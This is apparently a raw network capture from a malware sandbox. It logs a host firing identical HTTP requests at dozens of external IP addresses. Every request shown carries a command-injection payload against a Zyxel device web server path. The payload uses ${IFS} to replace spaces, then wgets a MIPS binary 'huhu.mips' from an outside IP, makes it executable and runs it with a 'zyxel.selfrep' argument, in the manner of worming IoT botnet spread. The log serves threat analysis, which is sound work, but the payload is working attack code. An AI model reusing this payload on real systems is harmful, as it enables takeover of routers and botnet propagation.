                                      Jan 19, 2024 17:29:50.130934000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8631192.168.2.1448528134.109.203.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130969048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8632192.168.2.1434852180.14.212.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.130996943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8633192.168.2.1444434223.3.47.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131050110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8634192.168.2.1448162186.27.173.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131077051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8635192.168.2.1434144143.109.193.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131112099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8636192.168.2.1444162129.121.81.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131140947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8637192.168.2.1454754122.130.64.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131186008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8638192.168.2.145780298.66.86.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131211996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8639192.168.2.1445836178.135.108.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131252050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8640192.168.2.145358465.196.100.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131279945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8641192.168.2.1448250199.8.50.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131340027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8642192.168.2.1438948167.15.157.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131362915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8643192.168.2.145106898.169.68.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131392956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8644192.168.2.143473899.160.71.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131428957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8645192.168.2.1441158105.169.78.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131484032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8646192.168.2.1441834153.186.221.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131519079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8647192.168.2.1457890195.178.238.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131570101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8648192.168.2.1440952187.101.241.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131602049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8649192.168.2.1441996135.174.125.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131649017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8650192.168.2.14338962.58.47.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131675959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8651192.168.2.145603257.48.54.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131716967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8652192.168.2.1439570188.93.229.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131787062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8653192.168.2.1456464132.127.142.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131818056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8654192.168.2.1433410109.4.79.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131849051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8655192.168.2.1436166185.208.180.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131886005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8656192.168.2.14388549.8.29.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131941080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8657192.168.2.14606028.199.109.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131961107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8658192.168.2.1440328212.88.61.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.131994963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8659192.168.2.143416078.111.115.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132044077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8660192.168.2.14452568.122.40.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132102013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8661192.168.2.145526275.17.229.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132143021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8662192.168.2.1458730119.113.55.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132181883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8663192.168.2.144999031.59.54.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132213116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8664192.168.2.1456266143.88.237.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132266998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8665192.168.2.143991819.56.104.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132318020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8666192.168.2.143718480.216.213.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132350922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8667192.168.2.143493897.132.19.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132388115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8668192.168.2.145398442.135.40.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132441998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8669192.168.2.143500489.143.186.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132497072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8670192.168.2.1436644115.212.57.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132527113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8671192.168.2.145658620.18.128.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132564068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8672192.168.2.1455306169.223.195.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132612944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8673192.168.2.1436184102.190.114.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132646084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8674192.168.2.144804014.67.166.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132709026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8675192.168.2.1453664145.230.90.168443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132744074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8676192.168.2.1451702210.105.43.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132783890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8677192.168.2.14422969.249.190.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132813931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8678192.168.2.1440176125.202.81.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132862091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8679192.168.2.1454762167.120.144.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132883072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8680192.168.2.1435654129.37.229.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132946968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8681192.168.2.145406867.181.0.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.132988930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8682192.168.2.1456222192.240.227.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133029938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8683192.168.2.1437644222.217.196.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133069992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8684192.168.2.144536852.175.128.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133126020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8685192.168.2.1458718185.132.6.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133147001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8686192.168.2.145283098.231.207.193443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133203030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8687192.168.2.1451942212.192.15.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133239031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8688192.168.2.144985261.111.32.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133296967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8689192.168.2.1457546144.129.199.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133317947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8690192.168.2.1454742111.3.250.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133368015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8691192.168.2.1447430128.196.208.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133423090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8692192.168.2.1447648121.154.135.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133462906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8693192.168.2.145875662.250.161.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:50.133517027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8694192.168.2.143988467.118.111.252443
                                      TimestampBytes transferredDirectionData
